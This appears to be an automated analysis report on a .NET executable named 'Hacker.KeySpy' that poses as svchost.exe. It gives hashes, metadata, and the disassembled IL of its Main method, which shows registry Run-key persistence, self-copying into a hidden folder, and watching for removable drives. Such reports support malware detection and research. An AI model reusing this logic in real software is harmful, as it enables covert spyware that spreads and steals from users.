c4638f8ea46fa6954e0b5589f231c769
PE Executable | MD5: c4638f8ea46fa6954e0b5589f231c769 | Size: 76.8 KB | application/x-dosexec
Symbol Obfuscation Score
|
| Hash | Hash Value |
|---|---|
| MD5 | c4638f8ea46fa6954e0b5589f231c769 |
| Sha1 | 6eeced94995d65a319091a60d324cf9c21fc9a93 |
| Sha256 | 7f138ed8d121160dd1d3c08d77a0075540a90c0d3da75dfa5a0f19979b8a7380 |
| Sha384 | 70dafe4bc33899d9514d389950f263e9d69bba7159bd00815336de74e399d451c42c827199f169eb57d68ba939df024d |
| Sha512 | b9d6f034112f88d217f274facc723bb9aa6239c92399fe78cef37cefcfa264ccf4595ec3c6514c64c87d2d530f8d0c3b8280388befac75c0ef245beeddfc761a |
| SSDeep | 1536:wNjum7Ynydw8KwHpF73i6EBXlLOUpgkYuUH8XIMOzH/ZxyO:wNjum0ydDKqX0LOUpzA84Bw |
| TLSH | 6B73BF09B7E98692C43E167944535B000370FD226A4BDB972FE174AF2D663818BB2F5F |
| Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: h:\Secret\Hacker.KeySpy\obj\Debug\svchost.pdb |
| Module Name | svchost.exe |
| Full Name | svchost.exe |
| EntryPoint | System.Int32 Hacker.KeySpy.Program::Main(System.String[]) |
| Scope Name | svchost.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | svchost |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 77 |
| Main Method | System.Int32 Hacker.KeySpy.Program::Main(System.String[]) |
| Main IL Instruction Count | 283 |
| Main IL | nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> ldc.i4.1 <null> ldstr APName ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr Hidden ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr HideFileExt ldc.i4.1 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldc.i4.2 <null> newobj System.Void Hacker.KeySpy.Controls.DriveListener::.ctor(System.IO.DriveType) stloc.2 <null> ldloc.2 <null> ldnull <null> ldftn System.Void Hacker.KeySpy.Program::flashDriveListener_DriveExists(System.Object,Hacker.KeySpy.Controls.DriveExistsEventArgs) newobj System.Void Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void Hacker.KeySpy.Controls.DriveListener::add_DriveExists(Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler) nop <null> ldloc.2 <null> callvirt System.Void Hacker.KeySpy.Controls.DriveListener::Start() nop <null> ldsfld System.IO.DriveInfo Hacker.KeySpy.Program::progDrive callvirt System.IO.DriveType System.IO.DriveInfo::get_DriveType() ldc.i4.3 <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_00C4: nop nop <null> ldloc.1 <null> stloc.s V_6 
ldloc.s V_6 brtrue.s IL_00B1: newobj System.Void Hacker.KeySpy.MainContext::.ctor() nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop newobj System.Void Hacker.KeySpy.MainContext::.ctor() stloc.3 <null> ldloc.3 <null> call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.ApplicationContext) nop <null> nop <null> br IL_02C0: ldc.i4.0 nop <null> ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0130: ldloc.1 nop <null> ldstr explorer.exe ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String,System.String) pop <null> nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0151: ldnull nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave 
IL_02F9: nop ldnull <null> stloc.s V_4 nop <null> ldc.i4.s 37 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_01B6: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01A5: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_01FE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01DD: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt 
System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave IL_02B1: nop pop <null> nop <null> ldc.i4.5 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0266: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_0255: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_02AE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_028D: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> 
ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave.s IL_02B1: nop nop <null> ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop pop <null> nop <null> ldc.i4.m1 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop nop <null> leave.s IL_02F3: nop nop <null> ldloc.0 <null> call System.Boolean System.Convert::ToBoolean(System.Int32) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_02E9: nop nop <null> call System.Void System.Windows.Forms.Application::Restart() nop <null> nop <null> br.s IL_02F1: nop nop <null> call System.Void System.Windows.Forms.Application::Exit() nop <null> nop <null> nop <null> endfinally <null> nop <null> ldloc.0 <null> stloc.s V_5 br.s IL_02F9: nop nop <null> ldloc.s V_5 ret <null> |